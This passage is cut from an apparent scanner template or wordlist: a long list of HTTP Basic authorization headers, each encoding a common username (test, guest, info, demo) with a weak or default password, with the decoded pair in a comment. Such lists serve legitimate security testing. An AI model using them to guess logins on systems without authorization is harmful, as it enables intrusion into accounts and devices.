"BASIC dGVzdDoxMjM0YWJjZA==" #test:1234abcd 437 | - "BASIC dGVzdDoxMjM0cXdlcg==" #test:1234qwer 438 | - "BASIC dGVzdDoxMjNhYmM=" #test:123abc 439 | - "BASIC dGVzdDoxMjNhc2Q=" #test:123asd 440 | - "BASIC dGVzdDoxMjNxd2U=" #test:123qwe 441 | - "BASIC 
dGVzdDoxMjNxd2Vhc2Q=" #test:123qweasd 442 | - "BASIC dGVzdDoxMnF3YXN6eA==" #test:12qwaszx 443 | - "BASIC dGVzdDoxZTJlM2U=" #test:1e2e3e 444 | - "BASIC dGVzdDoxZTJlM2U0ZQ==" #test:1e2e3e4e 445 | - "BASIC dGVzdDoxcTJxM3E=" #test:1q2q3q 446 | - "BASIC dGVzdDoxcTJxM3E0cQ==" #test:1q2q3q4q 447 | - "BASIC dGVzdDoxcTJ3M2U=" #test:1q2w3e 448 | - "BASIC dGVzdDoxcTJ3M2U0cg==" #test:1q2w3e4r 449 | - "BASIC dGVzdDoxcTJ3M2U0cjV0" #test:1q2w3e4r5t 450 | - "BASIC dGVzdDoxcWF6MndzeA==" #test:1qaz2wsx 451 | - "BASIC dGVzdDoxcWF6MndzeDNlZGM=" #test:1qaz2wsx3edc 452 | - "BASIC dGVzdDoxcWF6eHN3Mg==" #test:1qazxsw2 453 | - "BASIC dGVzdDoxcWF6WFNXQA==" #test:1qazXSW@ 454 | - "BASIC dGVzdDoxdzJxIVdAUQ==" #test:1w2q!W@Q 455 | - "BASIC dGVzdDoxdzJ3M3c=" #test:1w2w3w 456 | - "BASIC dGVzdDoxdzJ3M3c0dw==" #test:1w2w3w4w 457 | - "BASIC dGVzdDo1NDMyMQ==" #test:54321 458 | - "BASIC dGVzdDo2NTQzMjE=" #test:654321 459 | - "BASIC dGVzdDo4ODg4ODg=" #test:888888 460 | - "BASIC dGVzdDph" #test:a 461 | - "BASIC dGVzdDphYmMxMjM=" #test:abc123 462 | - "BASIC dGVzdDphYmNkMTIzNA==" #test:abcd1234 463 | - "BASIC dGVzdDpBZG1pbg==" #test:Admin 464 | - "BASIC dGVzdDphZG1pbg==" #test:admin 465 | - "BASIC dGVzdDphZG1pbiFA" #test:admin!@ 466 | - "BASIC dGVzdDphZG1pbjE=" #test:admin1 467 | - "BASIC dGVzdDphZG1pbjEy" #test:admin12 468 | - "BASIC dGVzdDphZG1pbjEyMw==" #test:admin123 469 | - "BASIC dGVzdDphZG1pbjEyMzQ1Ng==" #test:admin123456 470 | - "BASIC dGVzdDphZG1pbmlzdHJhdG9y" #test:administrator 471 | - "BASIC dGVzdDphbHBpbmU=" #test:alpine 472 | - "BASIC dGVzdDphc2QxMjM=" #test:asd123 473 | - "BASIC dGVzdDphc2Rm" #test:asdf 474 | - "BASIC dGVzdDphc2RmMTIzNA==" #test:asdf1234 475 | - "BASIC dGVzdDphc2RmZ2g=" #test:asdfgh 476 | - "BASIC dGVzdDpjZW50b3M=" #test:centos 477 | - "BASIC dGVzdDpjaGFuZ2VtZQ==" #test:changeme 478 | - "BASIC dGVzdDpjaXNjbw==" #test:cisco 479 | - "BASIC dGVzdDpjaXNjbzEyMw==" #test:cisco123 480 | - "BASIC dGVzdDpkZWZhdWx0" #test:default 481 | - "BASIC dGVzdDppZGMhQA==" #test:idc!@ 482 | - 
"BASIC dGVzdDpqaWFtaW1h" #test:jiamima 483 | - "BASIC dGVzdDpsZXRtZWlu" #test:letmein 484 | - "BASIC dGVzdDpsaW51eA==" #test:linux 485 | - "BASIC dGVzdDptYW5hZ2Vy" #test:manager 486 | - "BASIC dGVzdDptYXN0ZXI=" #test:master 487 | - "BASIC dGVzdDpvcmFjbGU=" #test:oracle 488 | - "BASIC dGVzdDpwQCQkdzByZA==" #test:p@$$w0rd 489 | - "BASIC dGVzdDpQQHNzdzByZA==" #test:P@ssw0rd 490 | - "BASIC dGVzdDpwQHNzdzByZA==" #test:p@ssw0rd 491 | - "BASIC dGVzdDpQQHNzdzByZCE=" #test:P@ssw0rd! 492 | - "BASIC dGVzdDpwQHNzd29yZA==" #test:p@ssword 493 | - "BASIC dGVzdDpwYTU1dzByZA==" #test:pa55w0rd 494 | - "BASIC dGVzdDpwYXNz" #test:pass 495 | - "BASIC dGVzdDpwYXNzdzByZA==" #test:passw0rd 496 | - "BASIC dGVzdDpwYXNzd29yZA==" #test:password 497 | - "BASIC dGVzdDpwYXNzd29yZDEyMw==" #test:password123 498 | - "BASIC dGVzdDpxMXcyZTM=" #test:q1w2e3 499 | - "BASIC dGVzdDpxMXcyZTNyNA==" #test:q1w2e3r4 500 | - "BASIC dGVzdDpxMXcyZTNyNHQ1" #test:q1w2e3r4t5 501 | - "BASIC dGVzdDpxYXp3c3hlZGM=" #test:qazwsxedc 502 | - "BASIC dGVzdDpxd2UxMjM=" #test:qwe123 503 | - "BASIC dGVzdDpxd2VyMTIzNA==" #test:qwer1234 504 | - "BASIC dGVzdDpxd2VydHk=" #test:qwerty 505 | - "BASIC dGVzdDpxd2VydHkxMjM=" #test:qwerty123 506 | - "BASIC dGVzdDpyZWRoYXQ=" #test:redhat 507 | - "BASIC dGVzdDpyb290" #test:root 508 | - "BASIC dGVzdDpyb290MTIz" #test:root123 509 | - "BASIC dGVzdDpyb290MTIzNA==" #test:root1234 510 | - "BASIC dGVzdDpyb290QDEyMw==" #test:root@123 511 | - "BASIC dGVzdDpyb290cm9vdA==" #test:rootroot 512 | - "BASIC dGVzdDpzZXJ2ZXI=" #test:server 513 | - "BASIC dGVzdDpzdXBlcnVzZXI=" #test:superuser 514 | - "BASIC dGVzdDpzeXN0ZW0=" #test:system 515 | - "BASIC dGVzdDpUZXN0" #test:Test 516 | - "BASIC dGVzdDp0ZXN0" #test:test 517 | - "BASIC dGVzdDp0ZXN0MTIz" #test:test123 518 | - "BASIC dGVzdDp0b29y" #test:toor 519 | - "BASIC dGVzdDp1Ym50" #test:ubnt 520 | - "BASIC dGVzdDp1YnVudHU=" #test:ubuntu 521 | - "BASIC dGVzdDpVc2Vy" #test:User 522 | - "BASIC dGVzdDp1c2Vy" #test:user 523 | - "BASIC dGVzdDp2bXdhcmU=" 
#test:vmware 524 | - "BASIC dGVzdDp3ZWxjb21l" #test:welcome 525 | - "BASIC dGVzdDp3dWJhbw==" #test:wubao 526 | - "BASIC dGVzdDp6YXExMndzeA==" #test:zaq12wsx 527 | - "BASIC dGVzdDp6eGN2Ym4=" #test:zxcvbn 528 | - "BASIC dGVzdDp6eGN2Ym5t" #test:zxcvbnm 529 | - "BASIC dGVzdDpjaGFuZ2VpdA==" #test:changeit 530 | - "BASIC Z3Vlc3Q6" #guest: 531 | - "BASIC Z3Vlc3Q6IVFBWjJ3c3g=" #guest:!QAZ2wsx 532 | - "BASIC Z3Vlc3Q6IXFhekB3c3g=" #guest:!qaz@wsx 533 | - "BASIC Z3Vlc3Q6MDAwMA==" #guest:0000 534 | - "BASIC Z3Vlc3Q6MDAwMDAw" #guest:000000 535 | - "BASIC Z3Vlc3Q6MDAwMDAwMA==" #guest:0000000 536 | - "BASIC Z3Vlc3Q6MDAwMDAwMDA=" #guest:00000000 537 | - "BASIC Z3Vlc3Q6MDk4NzY1NDMyMQ==" #guest:0987654321 538 | - "BASIC Z3Vlc3Q6MA==" #guest:0 539 | - "BASIC Z3Vlc3Q6MQ==" #guest:1 540 | - "BASIC Z3Vlc3Q6Mg==" #guest:2 541 | - "BASIC Z3Vlc3Q6Mw==" #guest:3 542 | - "BASIC Z3Vlc3Q6NA==" #guest:4 543 | - "BASIC Z3Vlc3Q6NQ==" #guest:5 544 | - "BASIC Z3Vlc3Q6Ng==" #guest:6 545 | - "BASIC Z3Vlc3Q6Nw==" #guest:7 546 | - "BASIC Z3Vlc3Q6OA==" #guest:8 547 | - "BASIC Z3Vlc3Q6OQ==" #guest:9 548 | - "BASIC Z3Vlc3Q6MTExMQ==" #guest:1111 549 | - "BASIC Z3Vlc3Q6MTExMTE=" #guest:11111 550 | - "BASIC Z3Vlc3Q6MTExMTEx" #guest:111111 551 | - "BASIC Z3Vlc3Q6MTExMTExMQ==" #guest:1111111 552 | - "BASIC Z3Vlc3Q6MTExMTExMTE=" #guest:11111111 553 | - "BASIC Z3Vlc3Q6MTEyMjMz" #guest:112233 554 | - "BASIC Z3Vlc3Q6MTIxMjEy" #guest:121212 555 | - "BASIC Z3Vlc3Q6MTIz" #guest:123 556 | - "BASIC Z3Vlc3Q6MTIzMTIz" #guest:123123 557 | - "BASIC Z3Vlc3Q6MTIzMzIx" #guest:123321 558 | - "BASIC Z3Vlc3Q6MTIzNA==" #guest:1234 559 | - "BASIC Z3Vlc3Q6MTIzNDU=" #guest:12345 560 | - "BASIC Z3Vlc3Q6MTIzNDU2" #guest:123456 561 | - "BASIC Z3Vlc3Q6MTIzNDU2Nw==" #guest:1234567 562 | - "BASIC Z3Vlc3Q6MTIzNDU2Nzg=" #guest:12345678 563 | - "BASIC Z3Vlc3Q6MTIzNDU2Nzg5" #guest:123456789 564 | - "BASIC Z3Vlc3Q6MTIzNDU2Nzg5MA==" #guest:1234567890 565 | - "BASIC Z3Vlc3Q6MTIzNGFiY2Q=" #guest:1234abcd 566 | - "BASIC Z3Vlc3Q6MTIzNHF3ZXI=" 
#guest:1234qwer 567 | - "BASIC Z3Vlc3Q6MTIzYWJj" #guest:123abc 568 | - "BASIC Z3Vlc3Q6MTIzYXNk" #guest:123asd 569 | - "BASIC Z3Vlc3Q6MTIzcXdl" #guest:123qwe 570 | - "BASIC Z3Vlc3Q6MTIzcXdlYXNk" #guest:123qweasd 571 | - "BASIC Z3Vlc3Q6MTJxd2Fzeng=" #guest:12qwaszx 572 | - "BASIC Z3Vlc3Q6MWUyZTNl" #guest:1e2e3e 573 | - "BASIC Z3Vlc3Q6MWUyZTNlNGU=" #guest:1e2e3e4e 574 | - "BASIC Z3Vlc3Q6MXEycTNx" #guest:1q2q3q 575 | - "BASIC Z3Vlc3Q6MXEycTNxNHE=" #guest:1q2q3q4q 576 | - "BASIC Z3Vlc3Q6MXEydzNl" #guest:1q2w3e 577 | - "BASIC Z3Vlc3Q6MXEydzNlNHI=" #guest:1q2w3e4r 578 | - "BASIC Z3Vlc3Q6MXEydzNlNHI1dA==" #guest:1q2w3e4r5t 579 | - "BASIC Z3Vlc3Q6MXFhejJ3c3g=" #guest:1qaz2wsx 580 | - "BASIC Z3Vlc3Q6MXFhejJ3c3gzZWRj" #guest:1qaz2wsx3edc 581 | - "BASIC Z3Vlc3Q6MXFhenhzdzI=" #guest:1qazxsw2 582 | - "BASIC Z3Vlc3Q6MXFhelhTV0A=" #guest:1qazXSW@ 583 | - "BASIC Z3Vlc3Q6MXcycSFXQFE=" #guest:1w2q!W@Q 584 | - "BASIC Z3Vlc3Q6MXcydzN3" #guest:1w2w3w 585 | - "BASIC Z3Vlc3Q6MXcydzN3NHc=" #guest:1w2w3w4w 586 | - "BASIC Z3Vlc3Q6NTQzMjE=" #guest:54321 587 | - "BASIC Z3Vlc3Q6NjU0MzIx" #guest:654321 588 | - "BASIC Z3Vlc3Q6ODg4ODg4" #guest:888888 589 | - "BASIC Z3Vlc3Q6YQ==" #guest:a 590 | - "BASIC Z3Vlc3Q6YWJjMTIz" #guest:abc123 591 | - "BASIC Z3Vlc3Q6YWJjZDEyMzQ=" #guest:abcd1234 592 | - "BASIC Z3Vlc3Q6QWRtaW4=" #guest:Admin 593 | - "BASIC Z3Vlc3Q6YWRtaW4=" #guest:admin 594 | - "BASIC Z3Vlc3Q6YWRtaW4hQA==" #guest:admin!@ 595 | - "BASIC Z3Vlc3Q6YWRtaW4x" #guest:admin1 596 | - "BASIC Z3Vlc3Q6YWRtaW4xMg==" #guest:admin12 597 | - "BASIC Z3Vlc3Q6YWRtaW4xMjM=" #guest:admin123 598 | - "BASIC Z3Vlc3Q6YWRtaW4xMjM0NTY=" #guest:admin123456 599 | - "BASIC Z3Vlc3Q6YWRtaW5pc3RyYXRvcg==" #guest:administrator 600 | - "BASIC Z3Vlc3Q6YWxwaW5l" #guest:alpine 601 | - "BASIC Z3Vlc3Q6YXNkMTIz" #guest:asd123 602 | - "BASIC Z3Vlc3Q6YXNkZg==" #guest:asdf 603 | - "BASIC Z3Vlc3Q6YXNkZjEyMzQ=" #guest:asdf1234 604 | - "BASIC Z3Vlc3Q6YXNkZmdo" #guest:asdfgh 605 | - "BASIC Z3Vlc3Q6Y2VudG9z" #guest:centos 606 | - "BASIC 
Z3Vlc3Q6Y2hhbmdlbWU=" #guest:changeme 607 | - "BASIC Z3Vlc3Q6Y2lzY28=" #guest:cisco 608 | - "BASIC Z3Vlc3Q6Y2lzY28xMjM=" #guest:cisco123 609 | - "BASIC Z3Vlc3Q6ZGVmYXVsdA==" #guest:default 610 | - "BASIC Z3Vlc3Q6aWRjIUA=" #guest:idc!@ 611 | - "BASIC Z3Vlc3Q6amlhbWltYQ==" #guest:jiamima 612 | - "BASIC Z3Vlc3Q6bGV0bWVpbg==" #guest:letmein 613 | - "BASIC Z3Vlc3Q6bGludXg=" #guest:linux 614 | - "BASIC Z3Vlc3Q6bWFuYWdlcg==" #guest:manager 615 | - "BASIC Z3Vlc3Q6bWFzdGVy" #guest:master 616 | - "BASIC Z3Vlc3Q6b3JhY2xl" #guest:oracle 617 | - "BASIC Z3Vlc3Q6cEAkJHcwcmQ=" #guest:p@$$w0rd 618 | - "BASIC Z3Vlc3Q6UEBzc3cwcmQ=" #guest:P@ssw0rd 619 | - "BASIC Z3Vlc3Q6cEBzc3cwcmQ=" #guest:p@ssw0rd 620 | - "BASIC Z3Vlc3Q6UEBzc3cwcmQh" #guest:P@ssw0rd! 621 | - "BASIC Z3Vlc3Q6cEBzc3dvcmQ=" #guest:p@ssword 622 | - "BASIC Z3Vlc3Q6cGE1NXcwcmQ=" #guest:pa55w0rd 623 | - "BASIC Z3Vlc3Q6cGFzcw==" #guest:pass 624 | - "BASIC Z3Vlc3Q6cGFzc3cwcmQ=" #guest:passw0rd 625 | - "BASIC Z3Vlc3Q6cGFzc3dvcmQ=" #guest:password 626 | - "BASIC Z3Vlc3Q6cGFzc3dvcmQxMjM=" #guest:password123 627 | - "BASIC Z3Vlc3Q6cTF3MmUz" #guest:q1w2e3 628 | - "BASIC Z3Vlc3Q6cTF3MmUzcjQ=" #guest:q1w2e3r4 629 | - "BASIC Z3Vlc3Q6cTF3MmUzcjR0NQ==" #guest:q1w2e3r4t5 630 | - "BASIC Z3Vlc3Q6cWF6d3N4ZWRj" #guest:qazwsxedc 631 | - "BASIC Z3Vlc3Q6cXdlMTIz" #guest:qwe123 632 | - "BASIC Z3Vlc3Q6cXdlcjEyMzQ=" #guest:qwer1234 633 | - "BASIC Z3Vlc3Q6cXdlcnR5" #guest:qwerty 634 | - "BASIC Z3Vlc3Q6cXdlcnR5MTIz" #guest:qwerty123 635 | - "BASIC Z3Vlc3Q6cmVkaGF0" #guest:redhat 636 | - "BASIC Z3Vlc3Q6cm9vdA==" #guest:root 637 | - "BASIC Z3Vlc3Q6cm9vdDEyMw==" #guest:root123 638 | - "BASIC Z3Vlc3Q6cm9vdDEyMzQ=" #guest:root1234 639 | - "BASIC Z3Vlc3Q6cm9vdEAxMjM=" #guest:root@123 640 | - "BASIC Z3Vlc3Q6cm9vdHJvb3Q=" #guest:rootroot 641 | - "BASIC Z3Vlc3Q6c2VydmVy" #guest:server 642 | - "BASIC Z3Vlc3Q6c3VwZXJ1c2Vy" #guest:superuser 643 | - "BASIC Z3Vlc3Q6c3lzdGVt" #guest:system 644 | - "BASIC Z3Vlc3Q6VGVzdA==" #guest:Test 645 | - "BASIC 
Z3Vlc3Q6dGVzdA==" #guest:test 646 | - "BASIC Z3Vlc3Q6dGVzdDEyMw==" #guest:test123 647 | - "BASIC Z3Vlc3Q6dG9vcg==" #guest:toor 648 | - "BASIC Z3Vlc3Q6dWJudA==" #guest:ubnt 649 | - "BASIC Z3Vlc3Q6dWJ1bnR1" #guest:ubuntu 650 | - "BASIC Z3Vlc3Q6VXNlcg==" #guest:User 651 | - "BASIC Z3Vlc3Q6dXNlcg==" #guest:user 652 | - "BASIC Z3Vlc3Q6dm13YXJl" #guest:vmware 653 | - "BASIC Z3Vlc3Q6d2VsY29tZQ==" #guest:welcome 654 | - "BASIC Z3Vlc3Q6d3ViYW8=" #guest:wubao 655 | - "BASIC Z3Vlc3Q6emFxMTJ3c3g=" #guest:zaq12wsx 656 | - "BASIC Z3Vlc3Q6enhjdmJu" #guest:zxcvbn 657 | - "BASIC Z3Vlc3Q6enhjdmJubQ==" #guest:zxcvbnm 658 | - "BASIC Z3Vlc3Q6Y2hhbmdlaXQ=" #guest:changeit 659 | - "BASIC aW5mbzo=" #info: 660 | - "BASIC aW5mbzohUUFaMndzeA==" #info:!QAZ2wsx 661 | - "BASIC aW5mbzohcWF6QHdzeA==" #info:!qaz@wsx 662 | - "BASIC aW5mbzowMDAw" #info:0000 663 | - "BASIC aW5mbzowMDAwMDA=" #info:000000 664 | - "BASIC aW5mbzowMDAwMDAw" #info:0000000 665 | - "BASIC aW5mbzowMDAwMDAwMA==" #info:00000000 666 | - "BASIC aW5mbzowOTg3NjU0MzIx" #info:0987654321 667 | - "BASIC aW5mbzow" #info:0 668 | - "BASIC aW5mbzox" #info:1 669 | - "BASIC aW5mbzoy" #info:2 670 | - "BASIC aW5mbzoz" #info:3 671 | - "BASIC aW5mbzo0" #info:4 672 | - "BASIC aW5mbzo1" #info:5 673 | - "BASIC aW5mbzo2" #info:6 674 | - "BASIC aW5mbzo3" #info:7 675 | - "BASIC aW5mbzo4" #info:8 676 | - "BASIC aW5mbzo5" #info:9 677 | - "BASIC aW5mbzoxMTEx" #info:1111 678 | - "BASIC aW5mbzoxMTExMQ==" #info:11111 679 | - "BASIC aW5mbzoxMTExMTE=" #info:111111 680 | - "BASIC aW5mbzoxMTExMTEx" #info:1111111 681 | - "BASIC aW5mbzoxMTExMTExMQ==" #info:11111111 682 | - "BASIC aW5mbzoxMTIyMzM=" #info:112233 683 | - "BASIC aW5mbzoxMjEyMTI=" #info:121212 684 | - "BASIC aW5mbzoxMjM=" #info:123 685 | - "BASIC aW5mbzoxMjMxMjM=" #info:123123 686 | - "BASIC aW5mbzoxMjMzMjE=" #info:123321 687 | - "BASIC aW5mbzoxMjM0" #info:1234 688 | - "BASIC aW5mbzoxMjM0NQ==" #info:12345 689 | - "BASIC aW5mbzoxMjM0NTY=" #info:123456 690 | - "BASIC aW5mbzoxMjM0NTY3" #info:1234567 691 
| - "BASIC aW5mbzoxMjM0NTY3OA==" #info:12345678 692 | - "BASIC aW5mbzoxMjM0NTY3ODk=" #info:123456789 693 | - "BASIC aW5mbzoxMjM0NTY3ODkw" #info:1234567890 694 | - "BASIC aW5mbzoxMjM0YWJjZA==" #info:1234abcd 695 | - "BASIC aW5mbzoxMjM0cXdlcg==" #info:1234qwer 696 | - "BASIC aW5mbzoxMjNhYmM=" #info:123abc 697 | - "BASIC aW5mbzoxMjNhc2Q=" #info:123asd 698 | - "BASIC aW5mbzoxMjNxd2U=" #info:123qwe 699 | - "BASIC aW5mbzoxMjNxd2Vhc2Q=" #info:123qweasd 700 | - "BASIC aW5mbzoxMnF3YXN6eA==" #info:12qwaszx 701 | - "BASIC aW5mbzoxZTJlM2U=" #info:1e2e3e 702 | - "BASIC aW5mbzoxZTJlM2U0ZQ==" #info:1e2e3e4e 703 | - "BASIC aW5mbzoxcTJxM3E=" #info:1q2q3q 704 | - "BASIC aW5mbzoxcTJxM3E0cQ==" #info:1q2q3q4q 705 | - "BASIC aW5mbzoxcTJ3M2U=" #info:1q2w3e 706 | - "BASIC aW5mbzoxcTJ3M2U0cg==" #info:1q2w3e4r 707 | - "BASIC aW5mbzoxcTJ3M2U0cjV0" #info:1q2w3e4r5t 708 | - "BASIC aW5mbzoxcWF6MndzeA==" #info:1qaz2wsx 709 | - "BASIC aW5mbzoxcWF6MndzeDNlZGM=" #info:1qaz2wsx3edc 710 | - "BASIC aW5mbzoxcWF6eHN3Mg==" #info:1qazxsw2 711 | - "BASIC aW5mbzoxcWF6WFNXQA==" #info:1qazXSW@ 712 | - "BASIC aW5mbzoxdzJxIVdAUQ==" #info:1w2q!W@Q 713 | - "BASIC aW5mbzoxdzJ3M3c=" #info:1w2w3w 714 | - "BASIC aW5mbzoxdzJ3M3c0dw==" #info:1w2w3w4w 715 | - "BASIC aW5mbzo1NDMyMQ==" #info:54321 716 | - "BASIC aW5mbzo2NTQzMjE=" #info:654321 717 | - "BASIC aW5mbzo4ODg4ODg=" #info:888888 718 | - "BASIC aW5mbzph" #info:a 719 | - "BASIC aW5mbzphYmMxMjM=" #info:abc123 720 | - "BASIC aW5mbzphYmNkMTIzNA==" #info:abcd1234 721 | - "BASIC aW5mbzpBZG1pbg==" #info:Admin 722 | - "BASIC aW5mbzphZG1pbg==" #info:admin 723 | - "BASIC aW5mbzphZG1pbiFA" #info:admin!@ 724 | - "BASIC aW5mbzphZG1pbjE=" #info:admin1 725 | - "BASIC aW5mbzphZG1pbjEy" #info:admin12 726 | - "BASIC aW5mbzphZG1pbjEyMw==" #info:admin123 727 | - "BASIC aW5mbzphZG1pbjEyMzQ1Ng==" #info:admin123456 728 | - "BASIC aW5mbzphZG1pbmlzdHJhdG9y" #info:administrator 729 | - "BASIC aW5mbzphbHBpbmU=" #info:alpine 730 | - "BASIC aW5mbzphc2QxMjM=" #info:asd123 731 | - "BASIC 
aW5mbzphc2Rm" #info:asdf 732 | - "BASIC aW5mbzphc2RmMTIzNA==" #info:asdf1234 733 | - "BASIC aW5mbzphc2RmZ2g=" #info:asdfgh 734 | - "BASIC aW5mbzpjZW50b3M=" #info:centos 735 | - "BASIC aW5mbzpjaGFuZ2VtZQ==" #info:changeme 736 | - "BASIC aW5mbzpjaXNjbw==" #info:cisco 737 | - "BASIC aW5mbzpjaXNjbzEyMw==" #info:cisco123 738 | - "BASIC aW5mbzpkZWZhdWx0" #info:default 739 | - "BASIC aW5mbzppZGMhQA==" #info:idc!@ 740 | - "BASIC aW5mbzpqaWFtaW1h" #info:jiamima 741 | - "BASIC aW5mbzpsZXRtZWlu" #info:letmein 742 | - "BASIC aW5mbzpsaW51eA==" #info:linux 743 | - "BASIC aW5mbzptYW5hZ2Vy" #info:manager 744 | - "BASIC aW5mbzptYXN0ZXI=" #info:master 745 | - "BASIC aW5mbzpvcmFjbGU=" #info:oracle 746 | - "BASIC aW5mbzpwQCQkdzByZA==" #info:p@$$w0rd 747 | - "BASIC aW5mbzpQQHNzdzByZA==" #info:P@ssw0rd 748 | - "BASIC aW5mbzpwQHNzdzByZA==" #info:p@ssw0rd 749 | - "BASIC aW5mbzpQQHNzdzByZCE=" #info:P@ssw0rd! 750 | - "BASIC aW5mbzpwQHNzd29yZA==" #info:p@ssword 751 | - "BASIC aW5mbzpwYTU1dzByZA==" #info:pa55w0rd 752 | - "BASIC aW5mbzpwYXNz" #info:pass 753 | - "BASIC aW5mbzpwYXNzdzByZA==" #info:passw0rd 754 | - "BASIC aW5mbzpwYXNzd29yZA==" #info:password 755 | - "BASIC aW5mbzpwYXNzd29yZDEyMw==" #info:password123 756 | - "BASIC aW5mbzpxMXcyZTM=" #info:q1w2e3 757 | - "BASIC aW5mbzpxMXcyZTNyNA==" #info:q1w2e3r4 758 | - "BASIC aW5mbzpxMXcyZTNyNHQ1" #info:q1w2e3r4t5 759 | - "BASIC aW5mbzpxYXp3c3hlZGM=" #info:qazwsxedc 760 | - "BASIC aW5mbzpxd2UxMjM=" #info:qwe123 761 | - "BASIC aW5mbzpxd2VyMTIzNA==" #info:qwer1234 762 | - "BASIC aW5mbzpxd2VydHk=" #info:qwerty 763 | - "BASIC aW5mbzpxd2VydHkxMjM=" #info:qwerty123 764 | - "BASIC aW5mbzpyZWRoYXQ=" #info:redhat 765 | - "BASIC aW5mbzpyb290" #info:root 766 | - "BASIC aW5mbzpyb290MTIz" #info:root123 767 | - "BASIC aW5mbzpyb290MTIzNA==" #info:root1234 768 | - "BASIC aW5mbzpyb290QDEyMw==" #info:root@123 769 | - "BASIC aW5mbzpyb290cm9vdA==" #info:rootroot 770 | - "BASIC aW5mbzpzZXJ2ZXI=" #info:server 771 | - "BASIC aW5mbzpzdXBlcnVzZXI=" #info:superuser 772 | 
- "BASIC aW5mbzpzeXN0ZW0=" #info:system 773 | - "BASIC aW5mbzpUZXN0" #info:Test 774 | - "BASIC aW5mbzp0ZXN0" #info:test 775 | - "BASIC aW5mbzp0ZXN0MTIz" #info:test123 776 | - "BASIC aW5mbzp0b29y" #info:toor 777 | - "BASIC aW5mbzp1Ym50" #info:ubnt 778 | - "BASIC aW5mbzp1YnVudHU=" #info:ubuntu 779 | - "BASIC aW5mbzpVc2Vy" #info:User 780 | - "BASIC aW5mbzp1c2Vy" #info:user 781 | - "BASIC aW5mbzp2bXdhcmU=" #info:vmware 782 | - "BASIC aW5mbzp3ZWxjb21l" #info:welcome 783 | - "BASIC aW5mbzp3dWJhbw==" #info:wubao 784 | - "BASIC aW5mbzp6YXExMndzeA==" #info:zaq12wsx 785 | - "BASIC aW5mbzp6eGN2Ym4=" #info:zxcvbn 786 | - "BASIC aW5mbzp6eGN2Ym5t" #info:zxcvbnm 787 | - "BASIC aW5mbzpjaGFuZ2VpdA==" #info:changeit 788 | - "BASIC ZGVtbzo=" #demo: 789 | - "BASIC ZGVtbzohUUFaMndzeA==" #demo:!QAZ2wsx 790 | - "BASIC ZGVtbzohcWF6QHdzeA==" #demo:!qaz@wsx 791 | - "BASIC ZGVtbzowMDAw" #demo:0000 792 | - "BASIC ZGVtbzowMDAwMDA=" #demo:000000 793 | - "BASIC ZGVtbzowMDAwMDAw" #demo:0000000 794 | - "BASIC ZGVtbzowMDAwMDAwMA==" #demo:00000000 795 | - "BASIC ZGVtbzowOTg3NjU0MzIx" #demo:0987654321 796 | - "BASIC ZGVtbzow" #demo:0 797 | - "BASIC ZGVtbzox" #demo:1 798 | - "BASIC ZGVtbzoy" #demo:2 799 | - "BASIC ZGVtbzoz" #demo:3 800 | - "BASIC ZGVtbzo0" #demo:4 801 | - "BASIC ZGVtbzo1" #demo:5 802 | - "BASIC ZGVtbzo2" #demo:6 803 | - "BASIC ZGVtbzo3" #demo:7 804 | - "BASIC ZGVtbzo4" #demo:8 805 | - "BASIC ZGVtbzo5" #demo:9 806 | - "BASIC ZGVtbzoxMTEx" #demo:1111 807 | - "BASIC ZGVtbzoxMTExMQ==" #demo:11111 808 | - "BASIC ZGVtbzoxMTExMTE=" #demo:111111 809 | - "BASIC ZGVtbzoxMTExMTEx" #demo:1111111 810 | - "BASIC ZGVtbzoxMTExMTExMQ==" #demo:11111111 811 | - "BASIC ZGVtbzoxMTIyMzM=" #demo:112233 812 | - "BASIC ZGVtbzoxMjEyMTI=" #demo:121212 813 | - "BASIC ZGVtbzoxMjM=" #demo:123 814 | - "BASIC ZGVtbzoxMjMxMjM=" #demo:123123 815 | - "BASIC ZGVtbzoxMjMzMjE=" #demo:123321 816 | - "BASIC ZGVtbzoxMjM0" #demo:1234 817 | - "BASIC ZGVtbzoxMjM0NQ==" #demo:12345 818 | - "BASIC ZGVtbzoxMjM0NTY=" #demo:123456 
819 | - "BASIC ZGVtbzoxMjM0NTY3" #demo:1234567 820 | - "BASIC ZGVtbzoxMjM0NTY3OA==" #demo:12345678 821 | - "BASIC ZGVtbzoxMjM0NTY3ODk=" #demo:123456789 822 | - "BASIC ZGVtbzoxMjM0NTY3ODkw" #demo:1234567890 823 | - "BASIC ZGVtbzoxMjM0YWJjZA==" #demo:1234abcd 824 | - "BASIC ZGVtbzoxMjM0cXdlcg==" #demo:1234qwer 825 | - "BASIC ZGVtbzoxMjNhYmM=" #demo:123abc 826 | - "BASIC ZGVtbzoxMjNhc2Q=" #demo:123asd 827 | - "BASIC ZGVtbzoxMjNxd2U=" #demo:123qwe 828 | - "BASIC ZGVtbzoxMjNxd2Vhc2Q=" #demo:123qweasd 829 | - "BASIC ZGVtbzoxMnF3YXN6eA==" #demo:12qwaszx 830 | - "BASIC ZGVtbzoxZTJlM2U=" #demo:1e2e3e 831 | - "BASIC ZGVtbzoxZTJlM2U0ZQ==" #demo:1e2e3e4e 832 | - "BASIC ZGVtbzoxcTJxM3E=" #demo:1q2q3q 833 | - "BASIC ZGVtbzoxcTJxM3E0cQ==" #demo:1q2q3q4q 834 | - "BASIC ZGVtbzoxcTJ3M2U=" #demo:1q2w3e 835 | - "BASIC ZGVtbzoxcTJ3M2U0cg==" #demo:1q2w3e4r 836 | - "BASIC ZGVtbzoxcTJ3M2U0cjV0" #demo:1q2w3e4r5t 837 | - "BASIC ZGVtbzoxcWF6MndzeA==" #demo:1qaz2wsx 838 | - "BASIC ZGVtbzoxcWF6MndzeDNlZGM=" #demo:1qaz2wsx3edc 839 | - "BASIC ZGVtbzoxcWF6eHN3Mg==" #demo:1qazxsw2 840 | - "BASIC ZGVtbzoxcWF6WFNXQA==" #demo:1qazXSW@ 841 | - "BASIC ZGVtbzoxdzJxIVdAUQ==" #demo:1w2q!W@Q 842 | - "BASIC ZGVtbzoxdzJ3M3c=" #demo:1w2w3w 843 | - "BASIC ZGVtbzoxdzJ3M3c0dw==" #demo:1w2w3w4w 844 | - "BASIC ZGVtbzo1NDMyMQ==" #demo:54321 845 | - "BASIC ZGVtbzo2NTQzMjE=" #demo:654321 846 | - "BASIC ZGVtbzo4ODg4ODg=" #demo:888888 847 | - "BASIC ZGVtbzph" #demo:a 848 | - "BASIC ZGVtbzphYmMxMjM=" #demo:abc123 849 | - "BASIC ZGVtbzphYmNkMTIzNA==" #demo:abcd1234 850 | - "BASIC ZGVtbzpBZG1pbg==" #demo:Admin 851 | - "BASIC ZGVtbzphZG1pbg==" 